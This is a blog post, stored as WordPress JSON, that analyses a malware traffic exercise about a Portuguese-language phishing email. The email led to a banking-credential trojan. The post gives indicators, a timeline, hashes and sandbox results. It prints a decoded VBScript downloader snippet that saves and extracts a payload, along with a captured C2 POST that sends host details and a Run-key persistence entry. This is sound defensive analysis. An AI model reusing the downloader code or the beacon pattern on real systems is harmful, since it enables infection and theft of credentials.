{"id":124,"date":"2015-08-18T13:54:33","date_gmt":"2015-08-18T12:54:33","guid":{"rendered":"http:\/\/www.herbiez.com\/?p=124"},"modified":"2016-02-23T21:55:14","modified_gmt":"2016-02-23T21:55:14","slug":"malware-exercise-2015-08-07-someone-was-fooled-by-a-malicious-email","status":"publish","type":"post","link":"https:\/\/www.herbiez.com\/?p=124","title":{"rendered":"Malware Exercise 2015-08-07 &#8211; Someone was fooled by a malicious email"},"content":{"rendered":"<h3>Prologue about this and future &#8220;Malware Exercise&#8221; posts<\/h3>\n<p>I have been wanting to blog about my experiences playing with malware and trying to figure out how they work, techniques that helped me dissect them, tools that I used, etc&#8230; but never really had the chance\/time to sit down and do it outside of work. Since security researcher Brad Duncan (follow him on <a href=\"http:\/\/twitter.com\/malware_traffic\" target=\"_blank\">Twitter<\/a> or via his site at <a href=\"http:\/\/malware-traffic-analysis.net\" target=\"_blank\">Malware Traffic Analysis<\/a>) has started to do lab exercises for other researchers\/analysts, I figured that it would be a good way of killing two birds with one stone (doing the exercise and writing about it). So with that being said, I will take what I have gathered from the lab exercises and use that as my blog posts to document how I found things, tools used, etc&#8230; For more information about the exercises that Brad has on his site, you can click <a href=\"http:\/\/www.malware-traffic-analysis.net\/training-exercises.html\" target=\"_blank\">here<\/a>.<\/p>\n<h3>Stupid emails!<\/h3>\n<p>TL;DR &#8211; In this exercise a user got an email and proceeded to get compromised from it. 
The end goal is to figure out which email it was, and to develop a timeline of events from the artifacts found.<\/p>\n<h3>My Results<\/h3>\n<ul>\n<li>The infected computer&#8217;s host name.<br \/>\n<blockquote><p>\n  Pertruide-PC\n<\/p><\/blockquote>\n<\/li>\n<li>The infected computer&#8217;s MAC address.<br \/>\n<blockquote><p>\n  00:1e:4f:6c:ba:05\n<\/p><\/blockquote>\n<\/li>\n<li>The infected computer&#8217;s operating system.<br \/>\n<blockquote><p>\n  Windows 7 running IE v11.0\n<\/p><\/blockquote>\n<\/li>\n<li>The date, time, subject line, and sender of the malicious email that caused the infection.<br \/>\n<blockquote><p>\n  To: degrando.rustlyn@world-of-widgets.com<br \/>\n  Subject: Voce recebeu comentario de voz em sua foto &#8211; 3192132<br \/>\n  From: &#8220;Facebook.com&#8221; &lt;accounts@passport.com&gt;<br \/>\n  Date: Tue, 4 Aug 2015 20:16:47 +0000 (UTC)\n<\/p><\/blockquote>\n<\/li>\n<li>Information on any malware associated with the infection.<br \/>\n<blockquote><p>\n  Based on what the alert is for, this looks to be banking credential theft malware. It looks at any open tabs in a browser to see if there is an open bank page. If none is found, it then looks in the browser history to see if anything is there. 
It has also been noted to drop a keylogger on the system to obtain credentials, or to set up a fake bank site to obtain credentials.\n<\/p><\/blockquote>\n<\/li>\n<li>Domains and IP addresses of any related traffic.<br \/>\n<blockquote><p>\n  http:\/\/www.ica.ufmg.br\/rha\/images\/pdf.php \/ 150.164.130.253<br \/>\n  http:\/\/downloadpdf.demojoomla.com\/Download.rar \/ 67.212.169.218<br \/>\n  http:\/\/downloadpdf.demojoomla.com\/Gravar.zip \/ 67.212.169.218<br \/>\n  http:\/\/australiano2015.com.br \/ 69.49.115.40\n<\/p><\/blockquote>\n<\/li>\n<li>A timeline of events leading to the infection.<br \/>\n<blockquote><p>\n  Tue, 4 Aug 2015 20:16:47 +0000 (UTC) &#8211; Email is delivered to Degrando<br \/>\n  Wednesday 2015-08-05 &#8211; SOC is alerted via Sguil<br \/>\n  (Approx) Wed, 05 Aug 2015 17:04 UTC+1 &#8211; Link to the initial malicious site is clicked (http:\/\/www.ica.ufmg.br\/rha\/images\/pdf.php)<br \/>\n  Wed, 05 Aug 2015 17:01 UTC+1 &#8211; Redirect from the initial malicious site (http:\/\/downloadpdf.demojoomla.com\/Download.rar)<br \/>\n  Wed, 05 Aug 2015 17:03 UTC+1 &#8211; Redirect from the initial malicious site (http:\/\/downloadpdf.demojoomla.com\/Gravar.rar)<br \/>\n  Wed, 05 Aug 2015 16:04 UTC+1 &#8211; Callback traffic to australiano2015.com.br\n<\/p><\/blockquote>\n<!--more--><\/li>\n<\/ul>\n<h3>Notes about this investigation:<\/h3>\n<p>Email #2 was the email message that led to the compromise. 
Take notice of the bold red parts of the email below:<\/p>\n<blockquote><p><span style=\"color: #ff0000;\"><strong>Received:\u00a0 from shopd.animatursyes.com (shopd.animatursyes.com [50.23.53.30]) by [redacted]; Tue, 4 Aug 2015 20:31:13 +0000 (UTC)<\/strong><\/span><br \/>\n<span style=\"color: #ff0000;\"><strong>Received:\u00a0 by shopd.animatursyes.com (Postfix, from userid 33) id 552C8198179; Tue, 4 Aug 2015 20:16:47 +0000 (UTC)<\/strong><\/span><br \/>\nTo:\u00a0 degrando.rustlyn@world-of-widgets.com<br \/>\nSubject:\u00a0 Voce recebeu comentario de voz em sua foto &#8211; 3192132<br \/>\n<span style=\"color: #ff0000;\"><strong>From:\u00a0 &#8220;Facebook.com&#8221; &lt;accounts@passport.com&gt;<\/strong><\/span><br \/>\nMIME-Version:\u00a0 1.0<br \/>\nContent-Type:\u00a0 multipart\/mixed; boundary=&#8221;13a82c8fbf1e42223cf0a61842c24be9&#8243;<br \/>\nMessage-Id:\u00a0 &lt;20150804201844.552C8198179@shopd.animatursyes.com&gt;<br \/>\nDate:\u00a0 Tue, 4 Aug 2015 20:16:47 +0000 (UTC)<\/p>\n<p>Content-Transfer-Encoding: 7bit<br \/>\nThis is a MIME encoded message.<\/p>\n<p>&#8211;13a82c8fbf1e42223cf0a61842c24be9<br \/>\nContent-Type: text\/html; charset=&#8221;iso-8859-1&#8243;<br \/>\nContent-Transfer-Encoding: quoted-printable<\/p>\n<p>&lt;!DOCTYPE HTML PUBLIC &#8220;-\/\/W3C\/\/DTD HTML 4.01 Transitional\/\/EN&#8221;&gt;<br \/>\n&lt;html&gt;<br \/>\n&lt;head&gt;<br \/>\n&lt;\/head&gt;<br \/>\n&lt;body&gt;<br \/>\n&lt;div class=3D&#8221;separator&#8221; style=3D&#8221;clear: both; text-align: center;&#8221;&gt;&lt;a<br \/>\nhref=3D&#8221;hxxp:\/\/www[.]ica[.]ufmg[.]br\/rha\/images\/pdf.php&#8221;&gt;&lt;img<br \/>\nsrc=3D&#8221;http:\/\/1.bp[.]blogspot[.]com\/-QsxSVcQGp-w\/VBnWc4vWVmI\/AAAAAAAAAC8\/YSm=XV-22scs\/s1600\/dd.png&#8221; border=3D&#8221;0&#8243;&gt;&lt;\/a&gt;&lt;\/div&gt;<br \/>\n&lt;div class=3D&#8221;separator&#8221; style=3D&#8221;clear: both; text-align: center;&#8221;&gt;<br \/>\n&lt;br&gt;<br \/>\n&lt;\/div&gt;<br \/>\n&lt;br&gt;<br 
\/>\n&lt;\/body&gt;<br \/>\n&lt;\/html&gt;<br \/>\n&lt;br&gt;&lt;a scr=3D&#8221;id:0,254670381546021&#8243;&gt;<\/p>\n<p>&#8211;13a82c8fbf1e42223cf0a61842c24be9<br \/>\nContent-Type: application\/octet-stream; name=&#8221;&#8221;<br \/>\nContent-Transfer-Encoding: base64<br \/>\nContent-Disposition: attachment<\/p>\n<p>&#8211;13a82c8fbf1e42223cf0a61842c24be9&#8211;<\/p><\/blockquote>\n<p>Now, the link in the email above returns a 302 redirect, as seen below in the PCAP:<\/p>\n<blockquote><p>GET \/rha\/images\/pdf.php HTTP\/1.1<br \/>\nAccept: text\/html, application\/xhtml+xml, *\/*<br \/>\nAccept-Language: en-US<br \/>\nUser-Agent: Mozilla\/5.0 (Windows NT 6.1; Trident\/7.0; rv:11.0) like Gecko<br \/>\nAccept-Encoding: gzip, deflate<br \/>\nHost: www.ica.ufmg.br<br \/>\nConnection: Keep-Alive<\/p>\n<p>HTTP\/1.1 302 Found<br \/>\nDate: Wed, 05 Aug 2015 16:04:22 GMT<br \/>\nServer: Apache<br \/>\nLocation: http:\/\/downloadpdf.demojoomla.com\/Download.rar<br \/>\nSet-Cookie: PHPSESSID=gum7l49126aqapc5file71o6l6; path=\/<br \/>\nExpires: Thu, 19 Nov 1981 08:52:00 GMT<br \/>\nCache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0<br \/>\nPragma: no-cache<br \/>\nSet-Cookie: NotCont=191.96.248.167; expires=Wed, 05-Aug-2015 17:04:22 GMT<br \/>\nContent-Length: 0<br \/>\nConnection: close<br \/>\nContent-Type: text\/html; charset=UTF-8<\/p><\/blockquote>\n<p>Based on the HTTPS logs that were supplied for this exercise, we can see that two files are downloaded, as shown below:<\/p>\n<p><a href=\"http:\/\/www.herbiez.com\/wp-content\/uploads\/2015\/08\/HTTPS-Logs.png\"><img loading=\"lazy\" decoding=\"async\" class=\"aligncenter size-full wp-image-127\" src=\"http:\/\/www.herbiez.com\/wp-content\/uploads\/2015\/08\/HTTPS-Logs.png\" alt=\"HTTPS Logs\" width=\"1600\" height=\"108\" \/><\/a><\/p>\n<blockquote><p>File #1 &#8211; Aug 5, 2015 17:01: http:\/\/downloadpdf.demojoomla.com\/Download.rar<br \/>\nMD5 = 
6325f04a77fce24c8c43b71d817d3fe7<br \/>\nVT link: http:\/\/www.virustotal.com\/file\/1c9b68f1ee6b842a3c7b01a7b41e74e6f22b1ee6925e6cfb067401ac573813be\/analysis\/1439293884\/<br \/>\nVT hits: 20 \/ 57<br \/>\nFirst Scan Date: 2015-08-11 11:51:24<\/p>\n<p style=\"padding-left: 30px;\">This Rar file contains the folder and file: Download\\Download.vbe<br \/>\nMD5 = 50ac6b67b095aeb4e85b3f94e66d8666<br \/>\nVT link: http:\/\/www.virustotal.com\/file\/26b4816ccc24624dc505d8711641630793d96da497bed827efd6392da276eecf\/analysis\/1438890108\/<br \/>\nVT hits: 16 \/ 55<br \/>\nFirst Scan Date: 2015-08-06 19:41:48<\/p>\n<p>File #2 &#8211; Aug 5, 2015 17:03: http:\/\/downloadpdf.demojoomla.com\/Gravar.rar<br \/>\nMD5 = e1d6e85f72d76845f9dc1c5c3d4fd469<br \/>\nVT link: http:\/\/www.virustotal.com\/file\/8b4afdcd97e2c42bb841f48b90bededbf64632dede258afcb5675d878c0e8fdc\/analysis\/1439071536\/<br \/>\nVT hits: 14 \/ 56<br \/>\nFirst Scan Date: 2015-08-08 22:05:36<\/p>\n<p style=\"padding-left: 30px;\">This zip file contains the file: dmw.exe<br \/>\nMD5 = 3c3e8b9b18fb1d14095adb0a16d457d8<br \/>\nVT link: http:\/\/www.virustotal.com\/file\/033742c2c7d5393300366b61ffd946d8ffe2a664f4cf8ed6b00ad28cafc66fb9\/analysis\/1439285641<br \/>\nVT hits: 16 \/ 56<br \/>\nFirst Scan Date: 2015-08-11 09:34:01<\/p>\n<\/blockquote>\n<p><a href=\"http:\/\/www.herbiez.com\/wp-content\/uploads\/2015\/08\/Details-of-DMW.png\"><img loading=\"lazy\" decoding=\"async\" class=\"aligncenter size-full wp-image-128\" src=\"http:\/\/www.herbiez.com\/wp-content\/uploads\/2015\/08\/Details-of-DMW.png\" alt=\"Details of DMW\" width=\"407\" height=\"323\" \/><\/a> <a href=\"http:\/\/www.herbiez.com\/wp-content\/uploads\/2015\/08\/Digital-Signature-of-DMW.png\"><img loading=\"lazy\" decoding=\"async\" class=\"aligncenter size-full wp-image-129\" src=\"http:\/\/www.herbiez.com\/wp-content\/uploads\/2015\/08\/Digital-Signature-of-DMW.png\" alt=\"Digital Signature of DMW\" width=\"413\" height=\"267\" 
\/><\/a><\/p>\n<p><strong>Note:<\/strong> The one thing that I would like to point out here is that the VBE file found in the &#8216;Download.rar&#8217; archive was decoded via the script found <a href=\"http:\/\/www.interclasse.com\/scripts\/decovbe.php\" target=\"_blank\">here<\/a>.<\/p>\n<p>When using that script, I ran it with cscript rather than wscript so I could pipe the output to a text file and try to decipher it from there. The <a href=\"http:\/\/github.com\/bloomer1016\/Malware-Excercises\/blob\/master\/2015-08-07%20Traffic%20Analysis%20Exercise\/Artifacts\/Download.Rar_Download.vbe_decoded.log\" target=\"_blank\">decoded file<\/a> can be found over on my GitHub page (where all my findings from the different exercises are located). Based on what I am seeing in the decoded &#8216;Download.Rar_Download.vbe_decoded.log&#8217;, it looks like the script checks to see if there is a file called &#8216;monumento.zip&#8217; and, if so, deletes it. It then downloads the Gravar.rar file.<\/p>\n<p>The part that I am not sure of is how it extracts itself and runs, considering that I am not seeing anything in the script that performs these tasks the way it does for the &#8216;monumento.zip&#8217; file, as you can see from the snippet below:<\/p>\n<pre class=\"brush: vb; light: false; title: Click here to expand...; toolbar: true; notranslate\" title=\"Click here to expand...\">If universal.Status = 200 Then\r\n  Dim cafezinho\r\n  Set cafezinho = CreateObject(Base64Decode(&quot;QURPREIuU3RyZWFt&quot;)) --&gt; Set cafezinho = CreateObject(Base64Decode(&quot;ADODB.Stream&quot;))\r\n  With cafezinho --&gt; CreateObject(Base64Decode(&quot;ADODB.Stream&quot;))\r\n    .Type = 1 'adTypeBinary\r\n    .Open\r\n    .Write universal.responseBody\r\n    .SaveToFile responde --&gt; .SaveToFile &quot;C:\\Users\\&quot; &amp; wScript.createObject(&quot;WScript.Shell&quot;).expandEnvironmentStrings(&quot;%USERNAME%&quot;) &amp; &quot;\\AppData\\Roaming&quot; &amp; &quot;\\monumento.zip&quot;\r\n    .Close\r\n  End With\r\n  set cafezinho = Nothing --&gt; set CreateObject(Base64Decode(&quot;ADODB.Stream&quot;)) = Nothing\r\nEnd If\r\n\r\nSet objt = CreateObject(&quot;Scripting.FileSystemObject&quot;)\r\nIf objt.FileExists(responde) Then --&gt; If objt.FileExists(&quot;C:\\Users\\&quot; &amp; wScript.createObject(&quot;WScript.Shell&quot;).expandEnvironmentStrings(&quot;%USERNAME%&quot;) &amp; &quot;\\AppData\\Roaming&quot; &amp; &quot;\\monumento.zip&quot;) THEN\r\nset sa = CreateObject(&quot;Shell.Application&quot;) \r\nset filesInzip=sa.NameSpace(responde).items --&gt; set filesInzip=sa.NameSpace(&quot;C:\\Users\\&quot; &amp; wScript.createObject(&quot;WScript.Shell&quot;).expandEnvironmentStrings(&quot;%USERNAME%&quot;) &amp; &quot;\\AppData\\Roaming&quot; &amp; &quot;\\monumento.zip&quot;).items\r\nsa.NameSpace(BAILARINA).CopyHere(filesInzip) --&gt; sa.NameSpace(&quot;C:\\Users\\&quot; &amp; wScript.createObject(&quot;WScript.Shell&quot;).expandEnvironmentStrings(&quot;%USERNAME%&quot;) &amp; &quot;\\AppData\\Roaming&quot;).CopyHere(filesInzip)\r\nEnd if<\/pre>\n<p>Regardless, I know that the dmw.exe file gets executed (somehow) and runs for a while. 
It then spawns a new process and calls vbc.exe which then starts to connect to the site australiano2015.com.br\/accord\/point.php and performs a POST to that site with information about the type of system and what is running on it as seen below:<\/p>\n<blockquote><p>POST \/accord\/point.php HTTP\/1.0<br \/>\nConnection: keep-alive<br \/>\nContent-Type: application\/x-www-form-urlencoded<br \/>\nContent-Length: 138<br \/>\nHost: australiano2015.com.br<br \/>\nAccept: text\/html, *\/*<br \/>\nAccept-Encoding: identity<br \/>\nUser-Agent: Mozilla\/5.0 (Windows NT 6.1; WOW64) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/39.0.2171.71 Safari\/537.36<\/p>\n<p>ID_MAQUINA=PERTRUIDE-PC&amp;VERSAO=3.7&amp;WIN=Microsoft+Windows+7+Home+Premium++6.1.7601&amp;NAVEGADOR=&amp;PLUGIN=Sem+Plugin&amp;AV=Sem+Anti-Virus+InstaladoHTTP\/1.1 200 OK<br \/>\nDate: Wed, 05 Aug 2015 16:04:39 GMT<br \/>\nContent-Length: 9<br \/>\nKeep-Alive: timeout=10, max=100<br \/>\nConnection: Keep-Alive<br \/>\nContent-Type: text\/html<br \/>\nSet-Cookie: TS0194eee0=013c871b06d32a5a34d3738a33af95bd8dbaade713d043ffbed029a8cb7a8f1762517dfc2f; Path=\/<\/p>\n<p>TRUEFalse<\/p><\/blockquote>\n<h3>The following is what I saw from my test run of the DMW.exe file on my Windows VM after running for a while:<\/h3>\n<ul>\n<li>Current Directory: C:\\Users\\Administrator\\Desktop\\Excercise\\Gravar\\<\/li>\n<li>Command Line: &#8220;C:\\windows\\Microsoft.NET\\Framework\\v2.0.50727\\vbc.exe&#8221;<\/li>\n<\/ul>\n<h3>File changes to the system using <a href=\"http:\/\/sourceforge.net\/projects\/regshot\/\" target=\"_blank\">RegShot<\/a> after running the dmw.exe file:<\/h3>\n<ul>\n<li>C:\\Users\\Administrator\\AppData\\Local\\Temp\\serpente.txt<\/li>\n<li>C:\\Users\\Administrator\\AppData\\Roaming\\botpc.cdr<\/li>\n<li>C:\\Users\\Administrator\\AppData\\sqlite3.dll<\/li>\n<\/ul>\n<h3>Reg Keys added to the system using <a href=\"http:\/\/sourceforge.net\/projects\/regshot\/\" target=\"_blank\">RegShot<\/a> after running 
the dmw.exe file:<\/h3>\n<ul>\n<li>HKU\\S-1-5-21-3862639240-4259269860-3308957193-500\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\UserAssist\\&#123;CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\\Count\\P:\\Hfref\\Nqzvavfgengbe\\Qrfxgbc\\Rkprepvfr\\Tenine\\qzj.rkr: 00 00 00 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 80 BF 00 00 80 BF 00 00 80 BF 00 00 80 BF 00 00 80 BF 00 00 80 BF 00 00 80 BF 00 00 80 BF 00 00 80 BF 00 00 80 BF FF FF FF FF 80 C7 4C 33 AE D5 D0 01 00 00 00 00<\/li>\n<li>HKU\\S-1-5-21-3862639240-4259269860-3308957193-500\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\MediaCenter: &#8220;C:\\Users\\Administrator\\AppData\\Roaming\\dmw.exe&#8221;<\/li>\n<\/ul>\n<p>Notice how the above regkey is added for persistence in an unusual place (at least I had not seen this location before this exercise).<\/p>\n<h3>&#8211; Update 8.19.2015<\/h3>\n<p>After talking to a couple of other analysts at work who did the exercise about how the dmw.exe file gets unzipped and executed, one of them brought up this particular line of code from the script:<\/p>\n<p><code>.SaveToFile responde --&gt; .SaveToFile \"C:\\Users\\\" &amp; wScript.createObject(\"WScript.Shell\").expandEnvironmentStrings(\"%USERNAME%\") &amp; \"\\AppData\\Roaming\" &amp; \"\\monumento.zip\"<\/code><\/p>\n<p>which tells the script to save the downloaded file (the gravar.zip file) <strong>AS<\/strong> &#8220;monumento.zip&#8221; on the filesystem. Later on in the code, that file gets unzipped and executed as well. Now that makes sense! Mystery solved.<\/p>\n","protected":false},"excerpt":{"rendered":"<p>Prologue about this and future &#8220;Malware Exercise&#8221; posts I have been wanting to blog about my experiences playing with malware and trying to figure out how they work, techniques that helped me dissect them, tools that I used, etc&#8230; but never really had the chance\/time to sit down and do it outside of work. 
Since Security Researcher Brad Duncan (follow him on Twitter or via his site at Malware Traffic Analysis) has started to do lab exercises for other researchers\/analysts I figured that it would be a good way of killing two birds with one stone (doing the exercise and&#8230;<\/p>\n<p> <a class=\"continue-reading-link\" href=\"https:\/\/www.herbiez.com\/?p=124\"><span>Continue reading<\/span><i class=\"crycon-right-dir\"><\/i><\/a> <\/p>\n","protected":false},"author":2,"featured_media":0,"comment_status":"open","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[4],"tags":[],"class_list":["post-124","post","type-post","status-publish","format-standard","hentry","category-packet-analysis"],"_links":{"self":[{"href":"https:\/\/www.herbiez.com\/index.php?rest_route=\/wp\/v2\/posts\/124","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.herbiez.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.herbiez.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.herbiez.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/www.herbiez.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=124"}],"version-history":[{"count":18,"href":"https:\/\/www.herbiez.com\/index.php?rest_route=\/wp\/v2\/posts\/124\/revisions"}],"predecessor-version":[{"id":171,"href":"https:\/\/www.herbiez.com\/index.php?rest_route=\/wp\/v2\/posts\/124\/revisions\/171"}],"wp:attachment":[{"href":"https:\/\/www.herbiez.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=124"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.herbiez.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=124"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.herbiez.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=124"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}
}